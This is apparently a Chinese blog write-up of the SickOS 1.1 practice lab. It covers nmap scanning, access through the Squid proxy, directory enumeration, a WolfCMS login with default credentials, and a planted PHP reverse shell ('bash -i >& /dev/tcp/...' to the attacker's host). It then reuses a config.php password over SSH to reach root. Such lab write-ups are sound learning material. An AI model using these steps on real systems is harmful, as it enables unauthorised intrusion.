SickOS1.1–打靶笔记
|
安全相关,靶场复现
|
1,271

768 字
|
5 分钟

nmap扫描

主机发现

nmap -sn 192.168.9.0/24

image

扫不出来?sudo试一下

image

增加了192.168.9.147

tcp开放端口扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.9.147 -oA nmap/ports

image

开放端口为:22,3128,8080

tcp详细扫描

sudo nmap -sT -sV -sC -O -p22,3128,8080 192.168.9.147 -oA nmap/detail

image

vul漏洞脚本扫描

sudo nmap --script=vuln -p22,3128,8080 192.168.9.147 -oA nmap/vul

image

没东西

udp扫描

sudo nmap -sU --top-ports 20 192.168.9.147 -oA nmap/udp

image

攻击

现在有三个开放端口:22,3128,8080

22还是照旧,没有信息的情况下先往后放。其他路都走不通再考虑爆破

3128是个代理,squid proxy​,可以上网看看有没有漏洞

8080是http但是关闭。结合3128的代理,可以考虑代理后访问,看看能不能行

3128

简单查看

先访问看看

image

哈?直接error还行。不过有版本号squid/3.1.19​,可以先搜搜有没有漏洞

搜到一个CVE-2019-12527,但是影响版本是Squid 4.0.23 -> 4.7

searchsploit也没有搜到有用的(其实有看到metasploit的脚本,但是学习嘛,暂时不考虑直接使用别人的脚本)

目录扫描

目录扫描一下:

sudo dirb http://192.168.9.147:3128/
sudo gobuster dir -u http://192.168.9.147:3128/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

没东西qaq,遗憾下播。看下一个

8080

代理

nmap扫描结果是8080关闭,但是有个3128代理服务器,很难不联想起来。

试试!

image

可以访问了,虽然还是error

image

目录扫描

sudo dirb http://192.168.9.147 -p http://192.168.9.147:3128/

image

+ http://192.168.9.147/cgi-bin/ (CODE:403|SIZE:289)                                                                                                                     
+ http://192.168.9.147/connect (CODE:200|SIZE:109)                                                                                                                      
+ http://192.168.9.147/index (CODE:200|SIZE:21)                                                                                                                         
+ http://192.168.9.147/index.php (CODE:200|SIZE:21)                                                                                                                     
+ http://192.168.9.147/robots (CODE:200|SIZE:45)                                                                                                                        
+ http://192.168.9.147/robots.txt (CODE:200|SIZE:45)                                                                                                                    
+ http://192.168.9.147/server-status (CODE:403|SIZE:294)

先看robots,这东西清晰明了

image

ok一个cms,攻击面有了

其他也检查了一下,没东西

wolfcms

image

点进去随便看看,发现是新建网站,基本没配置也不像投入使用的

这种情况,很有可能管理员使用的是默认账密,可以考虑弱密码进去

那么,就可以通过搜索,找到后台登录界面和默认账密!

后台路径不难找http://192.168.9.147/wolfcms/?/admin/login​,但是默认账密没有找到

前台有posted by Administrator​,那除了admin之外,administrator也可以试试。

字典直接开跑(当然这个密码太简单,你手测也能进去):admin/admin

image

后台

image

成功进入后台。随便点发现有php代码,可以编辑也能上传,轻松植入一句话木马。

image

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.9.132/6666 0>&1'");?>

点之前记得在kali上开启监听:nc -lvnp 6666

image

image

提权(config.php+密码喷洒)

www-data

检查一下信息:

image

sudo -l不让看

image

看看能不能读文件

image

config.php+/etc/passwd

config.php,可能有其他软件例如数据库的密码,拿到密码后可以做密码喷洒,看眼

image

root/john@123

在看眼/etc/passwd找用户,想尝试ssh

image

root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
# www-data和backup先不考虑

对了,shadow不让读。

sickos(拿flag)

ok这样的话,可以试试ssh远程链接,账密root/john@123,和sickos/john@123

sudo ssh sickos@192.168.9.147

image

基础信息检查

image

查看权限:三个ALL,root

image

启动新bash会话,切换到root

image

拿下flag!

image

writeup打靶笔记网络安全
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇